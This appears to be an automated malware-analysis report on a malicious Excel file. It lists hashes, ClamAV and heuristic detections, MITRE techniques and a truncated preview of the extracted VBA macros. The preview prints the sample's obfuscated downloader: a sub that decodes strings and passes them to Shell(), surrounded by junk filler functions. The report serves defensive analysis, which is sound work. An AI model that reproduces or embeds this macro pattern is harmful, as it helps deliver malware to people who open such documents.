Office (OLE) malware analysis — malicious · 771d606f4ea3eb11

MALICIOUS

Office (OLE)

144.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2020-09-15

MD5: 043d75d6322b495a1b23ff18e7f28999 SHA-1: 09fdcc7011bd49107111474f36ddb4f9de5b5136 SHA-256: 771d606f4ea3eb112864b2946dcc1dcdc5bdaf0569d9f0f664b01915afe3c6d3

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The script attempts to construct and execute a command by concatenating obfuscated strings. This functionality strongly suggests the sample is designed to download and execute a secondary payload, likely for further malicious actions.

Heuristics 3

ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 50942 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	50942 bytes
SHA-256: `933a1e1f52528eb65127e0bb34479665f53d4279d31d22aa8e327839ef59e296`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub MPPP() d0 = pM5Mt0LXG("u{p\|i(p\|\|xBddr6uxd", "8") Shell (d0 + pM5Mt0LXG("vm9wmss{", "9")) End Sub Public Function yRxUnznlfxuQALQNZqrM() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" End Function Private Function FwKUDCqcDamAizmqPD() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY End Function Public Function PQOTEyFjwvLPRJjyq() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End End Function Private Sub qNImoUpuCsYhfkHOVzMLcg() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End Dim HrZcwZdrnVkJJktFiB As String HrZcwZdrnVkJJktFiB = "1598" End Sub Public Function wQicueAkuAwIaowxGeZC() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End Dim HrZcwZdrnVkJJktFiB As String HrZcwZdrnVkJJktFiB = "1598" Dim SIojkinYfmCddsild As Long SIojkinYfmCddsild = "4503" End Function Private Function HpeypgtEnmaaBJVyR() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End Dim HrZcwZdrnVkJJktFiB As String HrZcwZdrnVkJJktFiB = "1598" Dim SIojkinYfmCddsild As Long SIojkinYfmCddsild = "4503" Dim nlfxuQALQNZqrMN As Currency nlfxuQALQNZqrMN = "3118" End Function Public Function FUBHbjZEzADohoStfvzBtSvaKuOFwKUDCqcDamAiz() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End Dim HrZcwZdrnVkJJktFiB As String HrZcwZdrnVkJJktFiB = "1598" Dim SIojkinYfmCddsild As Long SIojkinYfmCddsild = "4503" Dim nlfxuQALQNZqrMN As Currency nlfxuQALQNZqrMN = "3118" Dim BvNKhDciepsHdeox As Integer For BvNKhDciepsHdeox = 2 To 5 DoEvents Next BvNKhDciepsHdeox End Function Private Sub YrmbGPQOTEyFjwvL() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End Dim HrZcwZdrnVkJJktFiB As String HrZcwZdrnVkJJktFiB = "1598" Dim SIojkinYfmCddsild As Long SIojkinYfmCddsild = "4503" Dim nlfxuQALQNZqrMN As Currency nlfxuQALQNZqrMN = "3118" Dim BvNKhDciepsHdeox As Integer For BvNKhDciepsHdeox = 2 To 5 DoEvents Next BvNKhDciepsHdeox If "yqbIKgIMblFT" = "tTqpRyPCGgGRLebxT" Then End End Sub Public Function kgsIYthqNImoUuCsYghfkHOVzM() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End Dim HrZcwZdrnVkJJktFiB As String HrZcwZdrnVkJJktFiB = "1598" Dim SIojkinYfmCddsild As Long SIojkinYfmCddsild = "4503" Dim nlfxuQALQNZqrMN As Currency nlfxuQALQNZqrMN = "3118" Dim BvNKhDciepsHdeox As Integer For BvNKhDciepsHdeox = 2 To 5 DoEvents Next BvNKhDciepsHdeox If "yqbIKgIMblFT" = "tTqpRyPCGgGRLebxT" Then End GoTo azOHrZcwZdr azOHrZcwZdr: End Function Public Sub VkJJktFiBhEQ() Dim FUBHbjZEzADohoStfvzBtSvaK As Long FUBHbjZEzADohoStfvzBtSvaK = "2360" Dim hDciepsHdeoxsVlEY As Integer For hDciepsHdeoxsVlEY = 2 To 6 DoEvents Next hDciepsHdeoxsVlEY If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then E ... (truncated)

SHA-256: 933a1e1f52528eb65127e0bb34479665f53d4279d31d22aa8e327839ef59e296

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub MPPP()

d0 = pM5Mt0LXG("u{p|i(p||xBddr6uxd", "8")

Shell (d0 + pM5Mt0LXG("vm9wmss{", "9"))

End Sub
Public Function yRxUnznlfxuQALQNZqrM()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"

End Function
Private Function FwKUDCqcDamAizmqPD()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY

End Function
Public Function PQOTEyFjwvLPRJjyq()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End

End Function
Private Sub qNImoUpuCsYhfkHOVzMLcg()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"

End Sub
Public Function wQicueAkuAwIaowxGeZC()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"

End Function
Private Function HpeypgtEnmaaBJVyR()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"
Dim nlfxuQALQNZqrMN As Currency
nlfxuQALQNZqrMN = "3118"

End Function
Public Function FUBHbjZEzADohoStfvzBtSvaKuOFwKUDCqcDamAiz()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"
Dim nlfxuQALQNZqrMN As Currency
nlfxuQALQNZqrMN = "3118"
Dim BvNKhDciepsHdeox As Integer
For BvNKhDciepsHdeox = 2 To 5
   DoEvents
Next BvNKhDciepsHdeox

End Function
Private Sub YrmbGPQOTEyFjwvL()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"
Dim nlfxuQALQNZqrMN As Currency
nlfxuQALQNZqrMN = "3118"
Dim BvNKhDciepsHdeox As Integer
For BvNKhDciepsHdeox = 2 To 5
   DoEvents
Next BvNKhDciepsHdeox
If "yqbIKgIMblFT" = "tTqpRyPCGgGRLebxT" Then End

End Sub
Public Function kgsIYthqNImoUuCsYghfkHOVzM()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then End
Dim HrZcwZdrnVkJJktFiB As String
HrZcwZdrnVkJJktFiB = "1598"
Dim SIojkinYfmCddsild As Long
SIojkinYfmCddsild = "4503"
Dim nlfxuQALQNZqrMN As Currency
nlfxuQALQNZqrMN = "3118"
Dim BvNKhDciepsHdeox As Integer
For BvNKhDciepsHdeox = 2 To 5
   DoEvents
Next BvNKhDciepsHdeox
If "yqbIKgIMblFT" = "tTqpRyPCGgGRLebxT" Then End
GoTo azOHrZcwZdr
azOHrZcwZdr:

End Function
Public Sub VkJJktFiBhEQ()
Dim FUBHbjZEzADohoStfvzBtSvaK As Long
FUBHbjZEzADohoStfvzBtSvaK = "2360"
Dim hDciepsHdeoxsVlEY As Integer
For hDciepsHdeoxsVlEY = 2 To 6
   DoEvents
Next hDciepsHdeoxsVlEY
If "IMblFTGtTqp" = "yPCGgGRLebxTskgsIYt" Then E
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.